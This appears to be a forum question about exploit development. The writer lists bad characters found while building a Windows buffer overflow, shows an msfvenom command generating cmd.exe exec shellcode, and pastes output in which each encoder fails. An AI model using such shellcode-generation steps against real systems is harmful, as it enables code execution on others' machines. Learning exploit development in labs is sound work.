I am facing problem in finding bad characters because the hex codes are being replaced with \x3F & some other codes.
Here I have all the 256 hex chars from \x01 to \xFF and as you can see many of the hex char is being replaced with \x3F and other chars and hence I am not able to figure out the bad chars.
I tried to figure out the bad chars & the chars which are being replaced, which are:
\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x95\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb4\xb8\xbc\xbd\xbe
Then I used msfvenom to generate the shellcode but getting below result.
$msfvenom -a x86 --platform windows -p windows/exec cmd=cmd.exe -b '\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x95\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb4\xb8\xbc\xbd\xbe' -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor failed with A valid encoding key could not be found.
Attempting to encode payload with 1 iterations of x86/countdown
x86/countdown failed with Encoding failed due to a bad character (index=84, char=0x0d)
Attempting to encode payload with 1 iterations of x86/fnstenv_mov
x86/fnstenv_mov failed with A valid encoding key could not be found.
Attempting to encode payload with 1 iterations of x86/jmp_call_additive
x86/jmp_call_additive failed with Encoding failed due to a bad character (index=15, char=0x85)
Attempting to encode payload with 1 iterations of x86/xor_dynamic
Error: Bad character found in stub for the Dynamic key XOR Encoder encoder.
